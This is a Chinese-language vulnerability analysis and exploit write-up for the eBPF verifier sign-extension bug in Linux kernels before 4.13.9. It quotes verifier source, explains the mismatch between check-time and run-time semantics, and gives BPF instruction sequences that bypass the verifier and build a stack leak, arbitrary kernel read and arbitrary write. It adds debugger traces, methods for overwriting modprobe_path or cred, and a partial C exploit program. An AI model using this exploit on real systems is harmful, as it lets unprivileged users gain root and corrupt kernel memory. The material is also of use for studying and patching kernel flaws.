            /* snapshot the source register type before the access check */
            src_reg_type = regs[insn->src_reg].type;

            /* check that memory (src_reg + off) is readable,
             * the state of dst_reg will be updated by this func
             */
            err = check_mem_access(env, insn->src_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_READ,
                           insn->dst_reg);
            if (err)
                return err;

            /* only word-sized loads go through the imm bookkeeping below */
            if (BPF_SIZE(insn->code) != BPF_W) {
                insn_idx++;
                continue;
            }

            if (insn->imm == 0) {
                /* saw a valid insn
                 * dst_reg = *(u32 *)(src_reg + off)
                 * use reserved 'imm' field to mark this insn
                 */
                insn->imm = src_reg_type;// records the pointer type this load was seen with

            }
            /* the same insn was recorded with a different pointer type
             * and one of the two types is PTR_TO_CTX
             */
            else if (src_reg_type != insn->imm &&
                   (src_reg_type == PTR_TO_CTX ||
                    insn->imm == PTR_TO_CTX)) {
                /* ABuser program is trying to use the same insn
                 * dst_reg = *(u32*) (src_reg + off)
                 * with different pointer types:
                 * src_reg == ctx in one branch and
                 * src_reg == stack|map in some other branch.
                 * Reject it.
                 */
                verbose("same insn cannot be used with different pointers\n");
                return -EINVAL;
            }
        /* BPF_STX instructions */
        } else if (class == BPF_STX) {
            enum bpf_reg_type dst_reg_type;

            if (BPF_MODE(insn->code) == BPF_XADD) {
                err = check_xadd(env, insn);
                if (err)
                    return err;
                insn_idx++;
                continue;
            }

            /* check src1 operand */
            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
            /* check src2 operand */
            err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
            if (err)
                return err;

            dst_reg_type = regs[insn->dst_reg].type;

            /* check that memory (dst_reg + off) is writeable */
            err = check_mem_access(env, insn->dst_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_WRITE,
                           insn->src_reg);
            if (err)
                return err;

            /* same imm bookkeeping as for loads, keyed on dst_reg */
            if (insn->imm == 0) {
                insn->imm = dst_reg_type;
            } else if (dst_reg_type != insn->imm &&
                   (dst_reg_type == PTR_TO_CTX ||
                    insn->imm == PTR_TO_CTX)) {
                verbose("same insn cannot be used with different pointers\n");
                return -EINVAL;
            }
        /* BPF_ST instructions */
        } else if (class == BPF_ST) {
            if (BPF_MODE(insn->code) != BPF_MEM ||
                insn->src_reg != BPF_REG_0) {
                verbose("BPF_ST uses reserved fields\n");
                return -EINVAL;
            }
            /* check src operand */
            err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
            if (err)
                return err;

            /* check that memory (dst_reg + off) is writeable */
            err = check_mem_access(env, insn->dst_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_WRITE,
                           -1);
            if (err)
                return err;
        /* BPF_JMP instructions */
        } else if (class == BPF_JMP) {
            u8 opcode = BPF_OP(insn->code);
            /* function call (BPF_CALL) */
            if (opcode == BPF_CALL) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->off != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_CALL uses reserved fields\n");
                    return -EINVAL;
                }
                /* Author's note: check_call() checks that the call target
                 * is in range, checks the types of the five arguments
                 * (key / value / map address / stack_size, etc.), and
                 * updates the return-value register and reg_state.
                 */
                err = check_call(env, insn->imm);
                if (err)
                    return err;

            } else if (opcode == BPF_JA) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->imm != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_JA uses reserved fields\n");
                    return -EINVAL;
                }

                /* unconditional jump: follow it directly */
                insn_idx += insn->off + 1;
                continue;

            } else if (opcode == BPF_EXIT) {
                if (BPF_SRC(insn->code) != BPF_K ||
                    insn->imm != 0 ||
                    insn->src_reg != BPF_REG_0 ||
                    insn->dst_reg != BPF_REG_0) {
                    verbose("BPF_EXIT uses reserved fields\n");
                    return -EINVAL;
                }
                /* R0 carries the return value and BPF_EXIT ends the
                 * instruction stream, so R0 must have been written first.
                 */
                /* eBPF calling convetion is such that R0 is used
                 * to return the value from eBPF program.
                 * Make sure that it's readable at this time
                 * of bpf_exit, which means that program wrote
                 * something into it earlier
                 */
                err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
                if (err)
                    return err;

                if (is_pointer_value(env, BPF_REG_0)) {
                    verbose("R0 leaks addr as return value\n");
                    return -EACCES;
                }
                /* An exit ends the current branch; go back to a pending
                 * fork and explore the other branch, like backtracking
                 * through a maze.
                 */
process_bpf_exit:
                insn_idx = pop_stack(env, &prev_insn_idx);
                if (insn_idx < 0) {
                    break;
                } else {
                    do_print_state = true;
                    continue;
                }
            } else {
                err = check_cond_jmp_op(env, insn, &insn_idx);
                if (err)
                    return err;
            }
        } else if (class == BPF_LD) {
            u8 mode = BPF_MODE(insn->code);

            if (mode == BPF_ABS || mode == BPF_IND) {
                err = check_ld_abs(env, insn);
                if (err)
                    return err;

            } else if (mode == BPF_IMM) {
                err = check_ld_imm(env, insn);
                if (err)
                    return err;

                /* extra step on top of the increment at the loop end */
                insn_idx++;
            } else {
                verbose("invalid BPF_LD mode\n");
                return -EINVAL;
            }
        } else {
            verbose("unknown insn class %d\n", class);
            return -EINVAL;
        }

        insn_idx++;
    }

    return 0;
}

BPF指令的校验是在函数 do_check中，代码路径为 kernel/bpf/verifier.c，do_check通过一个无限循环来遍历提供的 bpf指令。

漏洞分析

漏洞概述

漏洞存在于内核版本小于 4.13.9的系统中，漏洞成因为 kernel/bpf/verifier.c文件中的 check_alu_op函数的检查问题，这个漏洞可以允许一个普通用户向系统发起拒绝服务攻击（内存破坏）或者提升到特权用户。

漏洞分析

漏洞成因是内核在对 ALU指令和 JMP指令在检测时和真正运行的语义解释不一样导致。

理论上虚拟执行和真实执行的执行路径应该是完全一致的，如果上文“BPF加载过程”中第2步安全校验过程中的虚拟执行路径和第4步 bpf的真实执行路径不完全一致的话，则会发生以下问题，示例如下：

1.BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF),             /* r9 = (u32)0xFFFFFFFF   */
2.BPF_JMP_IMM(BPF_JNE, BPF_REG_9, 0xFFFFFFFF, 2),   /* if (r9 == -1) {        */
3.BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */
4.BPF_EXIT_INSN()
5.……

第一条指令是个赋值语句，将 0xffffffff这个值赋值给 r9；

第二条指令是个条件跳转指令，如果 r9等于 0xffffffff，则退出程序，终止执行；如果 r9不等于 0xffffffff，则跳过后面2条指令继续执行第5条指令。

虚拟执行的时候，do_check检测到第2条指令等式恒成立，所以认为 BPF_JNE的跳转永远不会发生，第 4 条指令之后的指令永远不会执行，所以检测结束，do_check返回成功。

下面我们分析一下do_check中对 ALU指令进行检查，check_alu_op函数会对操作数进行检查，该代码的最后一个分支处会对如下两种情况进行检查：

BPF_ALU64|BPF_MOV|BPF_K，把 32 位立即数符号扩展后赋值给 64 位目的寄存器
BPF_ALU|BPF_MOV|BPF_K，把 32 位立即数赋值给目的寄存器的低 32 位（高 32 位为 0）

if (BPF_SRC(insn->code) == BPF_X) {
    if (BPF_CLASS(insn->code) == BPF_ALU64) {
        /* case: R1 = R2
                 * copy register state to dest reg
                 */
        regs[insn->dst_reg] = regs[insn->src_reg];
    } else {
        if (is_pointer_value(env, insn->src_reg)) {
            verbose("R%d partial copy of pointer\n",
                    insn->src_reg);
            return -EACCES;
        }
        regs[insn->dst_reg].type = UNKNOWN_VALUE;
        regs[insn->dst_reg].map_ptr = NULL;
    }
} else {
    /* case: R = imm
             * remember the value we stored into this reg
             */
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
}

可以看到对于 BPF_ALU64或者 BPF_ALU最后都是将立即数 insn->imm赋值给 regs[insn->dst_reg].imm。而 imm是 32位有符号立即数：

/* One eBPF instruction as quoted by the article: opcode, two 4-bit register
 * numbers, a signed 16-bit offset and a signed 32-bit immediate. */
struct bpf_insn {
    __u8    code;        /* opcode */
    __u8    dst_reg:4;    /* dest register */
    __u8    src_reg:4;    /* source register */
    __s16    off;        /* signed offset */
    __s32    imm;        /* signed immediate constant */
};

所以在校验阶段，无论是 BPF_ALU64|BPF_MOV|BPF_K 还是 BPF_ALU|BPF_MOV|BPF_K，当传入的立即数是 0xffffffff时，do_check记录下来的都是同一个 32位有符号立即数。
而在 eBPF程序真实执行时，对这两条指令的解释如下(__bpf_prog_run)：

    ALU_MOV_K:
        DST = (u32) IMM;
        CONT;
    ALU64_MOV_K:
        DST = IMM;
        CONT;

可以看到 ALU_MOV_K先将 IMM转换为 32位无符号数再传递给目的寄存器（高 32位为 0），而 ALU64_MOV_K却是将立即数 IMM直接赋值给了 64位目的寄存器；由于 IMM是 32位有符号数据，这里会对其进行一个 sign extension，导致两条指令执行后 DST获得的值并不相等。
所以在do_check检查时，这两条指令并无区别。但是在实际解释执行时，这两条指令的结果并不相同。运用这个差异即可对 do_check进行绕过。

在解释执行 BPF_JMP|BPF_JNE|BPF_K指令时，32位有符号的 IMM同样会因为 sign extension被扩展为 64位后再与 DST比较，所以 DST是零扩展还是符号扩展得到的，会使 DST != IMM的结果不一样：

    JMP_JNE_K:
        if (DST != IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;

但是，这里是否真的会发生符号拓展，从源码上无法直接看出，所以最好还是看汇编。真实执行时的汇编指令如下所示：

 ► 0xffffffff81173e7f    movsxd rdx, dword ptr [rbx + 4]
   0xffffffff81173e83    and    eax, 0xf
   0xffffffff81173e86    cmp    qword ptr [rbp + rax*8 - 0x278], rd
   0xffffffff81173e8e    je     0xffffffff8117493c <0xffffffff81174

   0xffffffff81173e94    movsx  rax, word ptr [rbx + 2]
   0xffffffff81173e99    lea    rbx, [rbx + rax*8 + 8]
   0xffffffff81173e9e    movzx  eax, byte ptr [rbx]
   0xffffffff81173ea1    jmp    qword ptr [r12 + rax*8]
    ↓
   0xffffffff81174421    movzx  eax, byte ptr [rbx + 1]
   0xffffffff81174425    movsx  rdx, word ptr [rbx + 2]
   0xffffffff8117442a    add    rbx, 8
──────────────────────────────────────────────[ STACK ]────────────
00:0000│ rsp  0xffff88000f86ba30 ◂— 0xbd
01:0008│      0xffff88000f86ba38 ◂— 0
02:0010│      0xffff88000f86ba40 —▸ 0xffff88000fa61800 ◂— 0
03:0018│      0xffff88000f86ba48 ◂— 0xffffffff
04:0020│      0xffff88000f86ba50 ◂— 1
05:0028│      0xffff88000f86ba58 —▸ 0xffff88000ca32780 ◂— 0x183
06:0030│      0xffff88000f86ba60 —▸ 0xffff88000f86bc18 —▸ 0xffffc90
, eax /* 0x2e00020001 */
07:0038│      0xffff88000f86ba68 —▸ 0xffff88000f86bb30 —▸ 0xffff880
mov    ah, 2 /* 0xffffffff000002b4 */
────────────────────────────────────────────[ BACKTRACE ]──────────
 ► f 0 ffffffff81173e7f
   f 1               bd
   f 2                0
───────────────────────────────────────────────────────────────────
pwndbg> x/10xg $rbx+0x4
0xffffc90000093034:     0x000000b7ffffffff      0x0000009500000000

可以看到这里列出的第一条汇编指令在读取立即数时使用的是 movsxd，也就是会进行符号拓展。立即数原本的值为 0xffffffff，但是执行完该指令后，rdx中用于比较的值变为 0xffffffffffffffff；而前面 BPF_MOV32_IMM写入寄存器的值是 (u32)IMM，即 0x00000000ffffffff。所以，后续第2条指令中的相等判断会永远不成立。

真实执行的时候，由于一个符号拓展的 bug，导致第2条指令中的等式不成立，于是 cpu就跳转到第5条指令继续执行，这里是漏洞产生的原因，这4条指令，可以绕过 BPF的代码安全检查。当安全检查被绕过了，用户就可以随意往内核中注入代码，也就能够提权。

漏洞利用

上述漏洞分析已经分析的很完整，即我们可以在输入的 bpf指令前4条指令用于绕过 do_check。在随后的指令中用于执行恶意指令。那么后续提权的恶意指令应该怎么布置呢？此处，以4.4.110内核版本进行exp的编写及分析。

BPF指令静态编写

这里讲述一下如何编写 exp中需要用到的各项功能。建议参考 linux源码中 samples/bpf目录下的示例，其中给出了各项指令的宏定义，只需要调用即可。

绕过do_check

    /* Comments sit before the line-continuation backslash; a backslash that is
     * followed by a comment is a stray token, not a continuation. */
    BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),               /* mov32 r2, 0xffffffff */                                   \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),     /* if (r2 == 0xffffffff) { exit(0) } else { skip 2 insns } */ \
    BPF_MOV64_IMM(BPF_REG_0, 0),                         \
    BPF_EXIT_INSN()

寄存器获取map值

BPF_LD_MAP_FD(BPF_REG_9, mapfd),        //r9=mapfd

/*
 * Emit the instruction sequence that looks up element `idx` of the map held
 * in r9 and loads its 64-bit value into register `dst`; r0 is left holding
 * the pointer returned by the lookup. The program exits if the lookup
 * returns 0.
 *
 * Only block comments are used inside the macro: a `//` comment that ends in
 * a continuation backslash swallows every following line of the definition.
 */
#define BPF_GET_MAP_FD(idx, dst)                                                                    \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),        /* r1 = r9 (map) */                                 \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),       /* r2 = fp */                                       \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),      /* r2 = fp - 4 (address of the key) */              \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),     /* *(u32 *)(fp - 4) = idx */                        \
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), /* r0 = &map[idx] or 0 */    \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),      /* if (r0 != 0) skip the exit below */              \
    BPF_EXIT_INSN(),                            /* r0 == 0: exit */                                 \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0)      /* dst = *(u64 *)r0 = map[idx] */

r2存储map[2]地址

        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0=&map[2]               */
        BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0 for exit(0)            */

获取栈地址

        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),                /* if (r6 != 0) skip the next two insns and fall through to the next op */
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),        /* r6 == 0: *r2 = r10, i.e. map[2] = fp */
        BPF_EXIT_INSN(),

r10是 fp，其值是一个内核栈地址，r2的值是 map[2]的地址。相当于将 r10的值赋值给 map[2]

任意读

        //read
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),            //if(op==1)
        BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0x0),   // r3 = *(r7)
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),        // *r2=map[2]=r3=*(r7)=*(addr)
        BPF_EXIT_INSN(),

这里 r7的值是需要读取的地址 addr，r2的值是 map[2]的地址，相当于把 addr的值赋值给 map[2]，用户态读取 map[2]即可获得 addr的值

任意写

        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                            //*r7=r8
        BPF_EXIT_INSN(),

r7的值是需要写的地址 addr,r8的值是需要写入的值。
利用 r6作为指令判断，当map[0]输入为 0、1、2时，r6也分别为对应的值。

当 r6==0时，将 r10的值写入 r2所指向的地址，而这里 r10为 rbp（帧指针），r2的值为 r0即 map[2]的地址，也就相当于将 rbp的值赋值给了 map[2]，可以读取栈地址。

当 r6==1时，将 r7所指向的值写入 r2所指向的地址，而这里 r7的值由 map[1]控制，r2的值为 map[2]的地址，所以这里就相当于实现如下指令，能够实现一个任意地址读。

map[2] = *map[1]

当r6==2时，将 r8的值赋值给 r7所指向的地址，实现了一个任意地址写。

在用户空间创建的 map[0]用来存放操作指令，map[1]用来存放需要进行读写的内存地址，map[2]用来存放泄露的地址或待写入的值。

map[0].value = 0，表示读取内核栈地址（帧指针 fp），放到 map[2]中。这里就实现了泄露内核栈地址。

map[0].value = 1，表示读取 map[1]中存放的地址的内容，放到 map[2]中。这里就实现了任意地址读。

map[0].value = 2，表示将 map[2]的值写入到 map[1]中的地址中。实现了任意地址写。

这里 r6用于 op，r7用于输入 address，r8用于输入或获取value。

利用方法

这里原exp中是使用覆写 cred结构体来提权。而这里已经实现了任意地址读和任意地址写，所以这里能够用于提权的方法十分多样，下面分别讲述两种提权方法：一种是简单的覆盖 modprobe_path，另一种即覆写 cred。

覆写modprobe_path

这种方法十分简单。首先需要泄露内核基址，这里由于我们有一个任意地址读，而经过调试 r10(即fp)的值加上0x28处的地址的值就是 __bpf_prog_run函数的返回地址。所以我们可以直接将返回地址泄露出来，以此来获得内核基址。同时，由于有一个任意地址写，所以可以直接向 modprobe_path的地址写上 /tmp/l.sh的16进制数字。完成覆写 modprobe_path。

下面是执行 r3 = *(u64 *)(fp+0x28); *(u64 *)r2=r3;指令时的汇编，可以看到此时 fp+0x28的值被存储到了 RAX中是返回地址 0xffffffff817272bc，而 r2此时的值为 0xffff8800077e59f0，该地址是 map[2]的地址，现在的值为 0。而执行完这两条指令后 map[2]的值已经变为返回地址0xffffffff817272bc。

*RAX  0xffffffff817272bc ◂— test   byte ptr [r13 + 2], 4 /* 0xad850f040245f641 */
 RBX  0xffffc90000002140 ◂— jnp    0xffffc90000002174 /* 0x327b; '{2' */
 RCX  0x28
 RDX  0x3
 RDI  0xffff8800077e5980 ◂— add    al, byte ptr [rax] /* 0x200000002 */
 RSI  0xffff88000fadfc8c ◂— add    al, byte ptr [rax] /* 0x4f16b58d00000002 */
 R8   0x0
 R9   0xffff88000b401600 ◂— and    byte ptr [rdx + 1], ah /* 0x1a220 */
 R10  0xffff88000fa9f300 ◂— 0
 R11  0xffff880000bec400 ◂— 0
 R12  0xffffffff81a33460 —▸ 0xffffffff81174779 ◂— mov    rsi, -0x7e5ccbc0 /* 0x4881a33440c6c748 */
 R13  0x0
 R14  0xffff880000bec400 ◂— 0
 R15  0x40
 RBP  0xffff88000fadfcb0 —▸ 0xffff88000fadfcf8 —▸ 0xffff88000fadfda0 —▸ 0xffff88000fadfdc0 —▸ 0xffff88
000fadfe38 ◂— ...
 RSP  0xffff88000fadfa30 ◂— 0x246
*RIP  0xffffffff811744a1 ◂— mov    qword ptr [rbp + rdx*8 - 0x278], rax /* 0xfffffd88d5848948 */
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff8117448c    shr    al, 4
   0xffffffff8117448f    and    eax, 0xf
   0xffffffff81174492    and    edx, 0xf
   0xffffffff81174495    mov    rax, qword ptr [rbp + rax*8 - 0x278]
   0xffffffff8117449d    mov    rax, qword ptr [rax + rcx]
 ► 0xffffffff811744a1    mov    qword ptr [rbp + rdx*8 - 0x278], rax
   0xffffffff811744a9    movzx  eax, byte ptr [rbx]
   0xffffffff811744ac    jmp    qword ptr [r12 + rax*8]
//返回地址
pwndbg> x/2xg $rbp
0xffff88000fadfcb0:     0xffff88000fadfcf8      0xffffffff817272bc
//r2存储的值是 map[2]的地址
pwndbg> x/10xg $rbp-0x278+2*8
0xffff88000fadfa48:     0xffff8800077e59f0      0xffff88000fadfa90
//执行前map[2]的结果为0
pwndbg> x/10xg 0xffff8800077e59f0
0xffff8800077e59f0:     0x0000000000000000      0x0000000000000000

//执行后map[2]中存储了返回地址，泄露地址成功
pwndbg> x/10xg 0xffff8800077e59f0
0xffff8800077e59f0:     0xffffffff817272bc      0x0000000000000000

覆写 cred

覆写 cred关键就是如何找到 cred所在的地址。这里最常见的思路就是通过任意读，不断爆破其地址，但是由于任意读每次只能读8字节，所以爆破稍微需要一点时间。然后参考别人的exp，又有两种思路：一种是根据内核栈地址，找到位于内核栈所在内存区域最低地址处的 thread_info地址，其第一个数据就存储了 task_struct地址，再获得 cred结构体地址；另一种是根据位于 bpf_reg_1中的 skbuff结构体，其中存储了 task_struct结构体，然后获得 cred结构体。第2种，这里我不太清楚为什么 bpf_reg_1中会存储 skbuff地址，所以我不做讲述。重点使用第1种方法。

首先简述一下内核栈与 thread_info的关系。

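由于task_struct随着版本的更新，其一直在不断增大，所以直接将 task_struct放入栈中会十分浪费栈空间，因此选择将 task_struct地址存储到 thread_info结构体中，而将 thread_info放入栈中。（注意：下面引用的定义中 task并不是第一个成员，看起来是其他架构上的定义；本文 exp是直接把 thread_info起始处的 8字节当作 task_struct指针来读取的，对应 task位于结构体首部的布局，具体请以目标内核源码为准。）thread_info结构体如下：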

/* Per-thread bookkeeping structure as quoted by the article; it holds the
 * pointer to the owning task_struct.
 * NOTE(review): field order is architecture specific - confirm against the
 * target kernel's sources. */
struct thread_info {
    unsigned long        flags;        /* low level flags */
    mm_segment_t        addr_limit;    /* address limit */
    struct task_struct    *task;        /* main task structure */
    int            preempt_count;    /* 0 => preemptable, <0 => bug */
    int            cpu;        /* cpu */
};

而 thread_info与内核栈 stack一起组成了一个 thread_union结构体：

/* Overlays thread_info with the kernel stack array, so both share one
 * THREAD_SIZE-byte region starting at the same address. */
union thread_union {
    struct thread_info thread_info;
    unsigned long stack[THREAD_SIZE/sizeof(long)];
};

#define THREAD_SIZE        16384
#define THREAD_START_SP        (THREAD_SIZE - 16)

内核定义了一个 thread_union联合体，将 thread_info和 stack共用一块内存区域。而 THREAD_SIZE就是内核栈的大小，如下图所示：

那么内核是如何获取 task_struct结构呢，内核实现了一个 current宏：

#define get_current() (current_thread_info()->task)
#define current get_current()

/*
 * how to get the current stack pointer from C
 */
register unsigned long current_stack_pointer asm ("sp");

/*
 * how to get the thread information struct from C
 */
static inline struct thread_info *current_thread_info(void) __attribute_const__;

/*
 * Return the current thread_info by clearing the low bits of the stack
 * pointer, i.e. rounding it down to a THREAD_SIZE boundary.
 */
static inline struct thread_info *current_thread_info(void)
{
    return (struct thread_info *)
        (current_stack_pointer & ~(THREAD_SIZE - 1));
}

可以看到其获取了一个内核栈地址 sp，然后通过对齐 THREAD_SIZE就可以获取 thread_info结构的基地址了。这里的 THREAD_SIZE为 16384即 0x4000，所以后面用 0x4000来对齐。

所以这里如果想找到 cred的地址，可以先泄露一个内核栈地址，再通过对齐获得 thread_info地址，再获得 task_struct地址，最后获得 cred地址。

得到 task_struct之后还需要确定 cred在 task_struct中的偏移，这里目前没有找到好的办法，不同版本各有不同，需要自行调试。

EXP

覆写 modprobe_path

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

/* Payload written to sockets[0] by write_msg(); never filled in, so it stays zeroed. */
char buffer[64];
/* Pair created by socketpair(); the BPF program is attached to sockets[1]. */
int sockets[2];
/* Descriptors returned by bpf_create_map() and load_prog(). */
int mapfd, progfd;
/* Not referenced anywhere in this program. */
int doredact = 0;

/* Set by leak_kernel() from the leaked address. */
size_t kernel_base = 0x0;
/* Starts as an offset; leak_kernel() adds kernel_base to make it an absolute address. */
size_t modprobe_path = 0xe4c800;

/* Size of the verifier log buffer passed to BPF_PROG_LOAD. */
#define LOG_BUF_SIZE 65536
/* Not referenced in this program. */
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];

/*
 * Print a "[!] "-prefixed printf-style message on stdout, then terminate the
 * process with exit status 1. Does not return.
 */
void Err(const char *fmt, ...){
    va_list ap;

    fputs("[!] ", stdout);
    va_start(ap, fmt);
    vfprintf(stdout, fmt, ap);
    va_end(ap);

    exit(1);
}

/* Convert a pointer to the 64-bit integer form stored in union bpf_attr fields. */
static __u64 ptr_to_u64(void *ptr)
{
    unsigned long raw = (unsigned long) ptr;

    return (__u64) raw;
}

/*
 * Thin wrapper around the BPF_PROG_LOAD command of the bpf() syscall.
 *
 * prog_type    - program type to load.
 * insns        - instruction array.
 * prog_len     - size of insns in BYTES (converted to an instruction count here).
 * license      - NUL-terminated license string.
 * kern_version - value stored in attr.kern_version.
 *
 * Verifier output is requested at log level 1 into the global bpf_log_buf.
 * Returns the raw syscall() result: a descriptor on success, -1 with errno
 * set on failure.
 */
int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version)
{
    union bpf_attr attr;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.prog_type = prog_type;
    attr.insns = ptr_to_u64((void *) insns);
    attr.insn_cnt = prog_len / sizeof(struct bpf_insn);
    attr.license = ptr_to_u64((void *) license);
    attr.log_buf = ptr_to_u64(bpf_log_buf);
    attr.log_size = LOG_BUF_SIZE;
    attr.log_level = 1;
    attr.kern_version = kern_version;

    /* Start from an empty log so stale text is never printed. */
    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Thin wrapper around the BPF_MAP_CREATE command of the bpf() syscall.
 *
 * map_type, key_size, value_size and max_entries are copied into the
 * attribute block. map_flags is accepted for signature compatibility but is
 * not passed to the kernel.
 *
 * Returns the raw syscall() result: a map descriptor on success, -1 with
 * errno set on failure.
 */
int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries, int map_flags)
{
    union bpf_attr attr;

    (void) map_flags;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

/*
 * Thin wrapper around the BPF_MAP_UPDATE_ELEM command of the bpf() syscall.
 *
 * fd    - map descriptor.
 * key   - pointer to the key.
 * value - pointer to the value to store.
 * flags - passed through in attr.flags.
 *
 * Returns the raw syscall() result (0 on success, -1 with errno set).
 */
int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
    union bpf_attr attr;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);
    attr.flags = flags;

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

/*
 * Thin wrapper around the BPF_MAP_LOOKUP_ELEM command of the bpf() syscall.
 *
 * fd    - map descriptor.
 * key   - pointer to the key to look up.
 * value - buffer that receives the element's value.
 *
 * Returns the raw syscall() result (0 on success, -1 with errno set).
 */
int bpf_lookup_elem(int fd, void *key, void *value)
{
    union bpf_attr attr;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/*
 * Instruction-building macros. Each one expands to a struct bpf_insn
 * compound literal (BPF_LD_IMM64_RAW expands to two of them), so they are
 * meant to be used as comma-separated elements of an instruction array.
 */

/* 64-bit ALU operation OP on DST with a 32-bit immediate operand. */
#define BPF_ALU64_IMM(OP, DST, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

/* 64-bit register-to-register move: DST = SRC. */
#define BPF_MOV64_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

/* 32-bit register-to-register move (BPF_ALU class). */
#define BPF_MOV32_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

/* Move of a 32-bit immediate using the BPF_ALU64 class. */
#define BPF_MOV64_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

/* Move of a 32-bit immediate using the BPF_ALU (32-bit) class. */
#define BPF_MOV32_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

/* 64-bit immediate load with src_reg = 0; see BPF_LD_IMM64_RAW. */
#define BPF_LD_IMM64(DST, IMM)                    \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

/* Two-slot 64-bit immediate load: the first instruction carries the low
 * 32 bits of IMM, the second (all other fields zero) the high 32 bits. */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_LD | BPF_DW | BPF_IMM,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = (__u32) (IMM) }),            \
    ((struct bpf_insn) {                    \
        .code  = 0,                     \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = ((__u64) (IMM)) >> 32 })

/* Fallback for headers that do not define the pseudo source-register value. */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD    1
#endif

/* 64-bit immediate load of MAP_FD with src_reg = BPF_PSEUDO_MAP_FD. */
